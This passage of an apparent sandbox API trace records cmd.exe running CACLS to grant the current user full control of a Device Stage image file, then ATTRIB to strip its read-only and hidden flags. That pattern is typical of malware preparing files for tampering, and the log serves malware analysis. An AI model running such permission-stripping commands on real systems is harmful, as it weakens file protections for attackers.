lpBuffer=0x30fec4, dwLength=0x1c | out: lpBuffer=0x30fec4*(BaseAddress=0x211000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0147.157] VirtualQuery (in: lpAddress=0x213000, lpBuffer=0x30fec4, dwLength=0x1c | out: lpBuffer=0x30fec4*(BaseAddress=0x213000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0147.157] VirtualQuery (in: lpAddress=0x310000, lpBuffer=0x30fec4, dwLength=0x1c | out: lpBuffer=0x30fec4*(BaseAddress=0x310000, AllocationBase=0x310000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0147.157] GetConsoleOutputCP () returned 0x1b5 [0147.157] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0147.157] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0147.157] _get_osfhandle (_FileHandle=1) returned 0x7 [0147.157] SetConsoleMode 
(hConsoleHandle=0x7, dwMode=0x0) returned 1 [0147.157] _get_osfhandle (_FileHandle=1) returned 0x7 [0147.158] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0147.158] _get_osfhandle (_FileHandle=1) returned 0x7 [0147.158] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0147.158] _get_osfhandle (_FileHandle=0) returned 0x3 [0147.158] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0147.158] _get_osfhandle (_FileHandle=0) returned 0x3 [0147.158] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0147.158] GetEnvironmentStringsW () returned 0xc0380* [0147.159] FreeEnvironmentStringsW (penv=0xc0380) returned 1 [0147.159] GetEnvironmentStringsW () returned 0xc0380* [0147.159] FreeEnvironmentStringsW (penv=0xc0380) returned 1 [0147.159] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30ee64 | out: phkResult=0x30ee64*=0x40) returned 0x0 [0147.159] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30ee6c, lpData=0x30ee70, lpcbData=0x30ee68*=0x1000 | out: lpType=0x30ee6c*=0x0, lpData=0x30ee70*=0x30, lpcbData=0x30ee68*=0x1000) returned 0x2 [0147.159] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30ee6c, lpData=0x30ee70, lpcbData=0x30ee68*=0x1000 | out: lpType=0x30ee6c*=0x4, lpData=0x30ee70*=0x1, lpcbData=0x30ee68*=0x4) returned 0x0 [0147.159] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30ee6c, lpData=0x30ee70, lpcbData=0x30ee68*=0x1000 | out: lpType=0x30ee6c*=0x0, lpData=0x30ee70*=0x1, lpcbData=0x30ee68*=0x1000) returned 0x2 [0147.159] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30ee6c, lpData=0x30ee70, lpcbData=0x30ee68*=0x1000 | out: lpType=0x30ee6c*=0x4, lpData=0x30ee70*=0x0, lpcbData=0x30ee68*=0x4) 
returned 0x0 [0147.159] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30ee6c, lpData=0x30ee70, lpcbData=0x30ee68*=0x1000 | out: lpType=0x30ee6c*=0x4, lpData=0x30ee70*=0x40, lpcbData=0x30ee68*=0x4) returned 0x0 [0147.159] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30ee6c, lpData=0x30ee70, lpcbData=0x30ee68*=0x1000 | out: lpType=0x30ee6c*=0x4, lpData=0x30ee70*=0x40, lpcbData=0x30ee68*=0x4) returned 0x0 [0147.159] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30ee6c, lpData=0x30ee70, lpcbData=0x30ee68*=0x1000 | out: lpType=0x30ee6c*=0x0, lpData=0x30ee70*=0x40, lpcbData=0x30ee68*=0x1000) returned 0x2 [0147.159] RegCloseKey (hKey=0x40) returned 0x0 [0147.159] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30ee64 | out: phkResult=0x30ee64*=0x40) returned 0x0 [0147.159] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30ee6c, lpData=0x30ee70, lpcbData=0x30ee68*=0x1000 | out: lpType=0x30ee6c*=0x0, lpData=0x30ee70*=0x40, lpcbData=0x30ee68*=0x1000) returned 0x2 [0147.159] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30ee6c, lpData=0x30ee70, lpcbData=0x30ee68*=0x1000 | out: lpType=0x30ee6c*=0x4, lpData=0x30ee70*=0x1, lpcbData=0x30ee68*=0x4) returned 0x0 [0147.159] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30ee6c, lpData=0x30ee70, lpcbData=0x30ee68*=0x1000 | out: lpType=0x30ee6c*=0x0, lpData=0x30ee70*=0x1, lpcbData=0x30ee68*=0x1000) returned 0x2 [0147.159] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30ee6c, lpData=0x30ee70, lpcbData=0x30ee68*=0x1000 | out: lpType=0x30ee6c*=0x4, lpData=0x30ee70*=0x0, lpcbData=0x30ee68*=0x4) returned 0x0 [0147.160] RegQueryValueExW (in: hKey=0x40, 
lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30ee6c, lpData=0x30ee70, lpcbData=0x30ee68*=0x1000 | out: lpType=0x30ee6c*=0x4, lpData=0x30ee70*=0x9, lpcbData=0x30ee68*=0x4) returned 0x0 [0147.160] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30ee6c, lpData=0x30ee70, lpcbData=0x30ee68*=0x1000 | out: lpType=0x30ee6c*=0x4, lpData=0x30ee70*=0x9, lpcbData=0x30ee68*=0x4) returned 0x0 [0147.160] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30ee6c, lpData=0x30ee70, lpcbData=0x30ee68*=0x1000 | out: lpType=0x30ee6c*=0x0, lpData=0x30ee70*=0x9, lpcbData=0x30ee68*=0x1000) returned 0x2 [0147.160] RegCloseKey (hKey=0x40) returned 0x0 [0147.160] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886375 [0147.160] srand (_Seed=0x5b886375) [0147.160] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png\"" [0147.160] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png\"" [0147.160] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0147.160] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xc1ae0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0147.160] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: 
lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0147.161] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0147.161] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0147.161] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0147.161] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0147.161] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0147.161] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0147.161] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0147.161] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0147.161] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0147.161] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0147.161] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0147.161] GetEnvironmentStringsW () returned 0xc24d0* [0147.161] FreeEnvironmentStringsW (penv=0xc24d0) returned 1 [0147.161] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0147.161] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0147.161] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0147.161] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0147.161] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0147.161] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0147.161] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0147.161] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0147.161] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0147.161] 
_wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0147.162] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x30fc30 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0147.162] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x30fc30, lpFilePart=0x30fc2c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x30fc2c*="Desktop") returned 0x18 [0147.162] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0147.162] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x30f9ac | out: lpFindFileData=0x30f9ac) returned 0xc0b60 [0147.162] FindClose (in: hFindFile=0xc0b60 | out: hFindFile=0xc0b60) returned 1 [0147.162] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x30f9ac | out: lpFindFileData=0x30f9ac) returned 0xc0b60 [0147.162] FindClose (in: hFindFile=0xc0b60 | out: hFindFile=0xc0b60) returned 1 [0147.162] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x30f9ac | out: lpFindFileData=0x30f9ac) returned 0xc0b60 [0147.162] FindClose (in: hFindFile=0xc0b60 | out: hFindFile=0xc0b60) returned 1 [0147.163] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0147.163] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0147.163] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0147.163] GetEnvironmentStringsW () returned 0xc0380* [0147.163] FreeEnvironmentStringsW (penv=0xc0380) returned 1 [0147.163] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0147.164] GetConsoleOutputCP () returned 0x1b5 [0147.164] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0147.164] 
GetUserDefaultLCID () returned 0x409 [0147.164] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0147.164] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x30fd70, cchData=128 | out: lpLCData="0") returned 2 [0147.164] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x30fd70, cchData=128 | out: lpLCData="0") returned 2 [0147.164] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x30fd70, cchData=128 | out: lpLCData="1") returned 2 [0147.164] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0147.164] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0147.165] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0147.165] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0147.165] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0147.165] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0147.165] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0147.165] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0147.165] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0147.165] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0147.165] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0147.166] GetConsoleTitleW (in: lpConsoleTitle=0xb0a08, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0147.166] 
GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0147.166] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0147.166] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0147.166] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0147.167] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0147.167] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0147.167] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0147.167] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0147.167] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0147.167] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0147.167] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0147.167] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0147.171] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0147.171] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0147.171] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0147.171] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0147.171] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0147.171] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0147.171] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0147.174] SetErrorMode (uMode=0x0) returned 0x0 [0147.174] SetErrorMode (uMode=0x1) returned 0x0 [0147.175] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xc2028, lpFilePart=0x30f524 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x30f524*="Desktop") returned 0x18 [0147.175] SetErrorMode (uMode=0x0) returned 0x1 [0147.175] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: 
lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0147.175] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0147.180] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0147.180] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x30f2a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30f2a0) returned 0xffffffff [0147.181] GetLastError () returned 0x2 [0147.181] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x30f2a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30f2a0) returned 0xffffffff [0147.181] GetLastError () returned 0x2 [0147.181] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x30f2a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30f2a0) returned 0xb0f68 [0147.181] FindClose (in: hFindFile=0xb0f68 | out: hFindFile=0xb0f68) returned 1 [0147.181] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x30f2a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30f2a0) returned 0xffffffff [0147.181] GetLastError () returned 0x2 [0147.181] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x30f2a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30f2a0) returned 0xb0f68 [0147.181] FindClose (in: hFindFile=0xb0f68 | out: hFindFile=0xb0f68) returned 1 [0147.181] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0147.181] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0147.181] GetConsoleTitleW (in: 
lpConsoleTitle=0x30f798, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0147.182] InitializeProcThreadAttributeList (in: lpAttributeList=0x30f620, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x30f6e8 | out: lpAttributeList=0x30f620, lpSize=0x30f6e8) returned 1 [0147.182] UpdateProcThreadAttribute (in: lpAttributeList=0x30f620, dwFlags=0x0, Attribute=0x60001, lpValue=0x30f6e0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x30f620, lpPreviousValue=0x0) returned 1 [0147.182] GetStartupInfoW (in: lpStartupInfo=0x30f5dc | out: lpStartupInfo=0x30f5dc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0147.182] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0147.183] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x30f67c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x30f6c8 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\Device 
Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x30f6c8*(hProcess=0x50, hThread=0x4c, dwProcessId=0xc08, dwThreadId=0xbf8)) returned 1 [0147.185] CloseHandle (hObject=0x4c) returned 1 [0147.185] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0147.185] GetEnvironmentStringsW () returned 0xc04f0* [0147.185] FreeEnvironmentStringsW (penv=0xc04f0) returned 1 [0147.185] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0147.222] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x30f5bc | out: lpExitCode=0x30f5bc*=0x0) returned 1 [0147.222] CloseHandle (hObject=0x50) returned 1 [0147.222] _vsnwprintf (in: _Buffer=0x30f704, _BufferCount=0x13, _Format="%08X", _ArgList=0x30f5c8 | out: _Buffer="00000000") returned 8 [0147.223] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0147.223] GetEnvironmentStringsW () returned 0xc2320* [0147.223] FreeEnvironmentStringsW (penv=0xc2320) returned 1 [0147.223] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0147.223] GetEnvironmentStringsW () returned 0xc2320* [0147.223] FreeEnvironmentStringsW (penv=0xc2320) returned 1 [0147.223] DeleteProcThreadAttributeList (in: lpAttributeList=0x30f620 | out: lpAttributeList=0x30f620) [0147.223] GetConsoleTitleW (in: lpConsoleTitle=0x30fa04, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0147.223] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0147.223] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0147.223] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0147.223] FindFirstFileExW (in: 
lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x30f2a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30f2a0) returned 0xffffffff [0147.224] GetLastError () returned 0x2 [0147.224] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x30f2a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30f2a0) returned 0xffffffff [0147.224] GetLastError () returned 0x2 [0147.224] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x30f2a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30f2a0) returned 0xbe550 [0147.224] FindClose (in: hFindFile=0xbe550 | out: hFindFile=0xbe550) returned 1 [0147.224] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x30f2a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30f2a0) returned 0xffffffff [0147.224] GetLastError () returned 0x2 [0147.224] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x30f2a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30f2a0) returned 0xbe550 [0147.224] FindClose (in: hFindFile=0xbe550 | out: hFindFile=0xbe550) returned 1 [0147.224] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0147.224] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0147.224] GetConsoleTitleW (in: lpConsoleTitle=0x30f798, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0147.224] InitializeProcThreadAttributeList (in: lpAttributeList=0x30f620, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x30f6e8 | out: lpAttributeList=0x30f620, lpSize=0x30f6e8) returned 1 [0147.224] UpdateProcThreadAttribute (in: lpAttributeList=0x30f620, dwFlags=0x0, Attribute=0x60001, lpValue=0x30f6e0, 
cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x30f620, lpPreviousValue=0x0) returned 1 [0147.225] GetStartupInfoW (in: lpStartupInfo=0x30f5dc | out: lpStartupInfo=0x30f5dc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0147.225] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0147.225] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x30f67c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x30f6c8 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png\"", lpProcessInformation=0x30f6c8*(hProcess=0x4c, hThread=0x50, dwProcessId=0xa48, dwThreadId=0xbc0)) returned 1 [0147.227] CloseHandle (hObject=0x50) returned 1 [0147.227] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0147.227] GetEnvironmentStringsW () returned 0xc2480* [0147.227] FreeEnvironmentStringsW (penv=0xc2480) returned 1 [0147.227] 
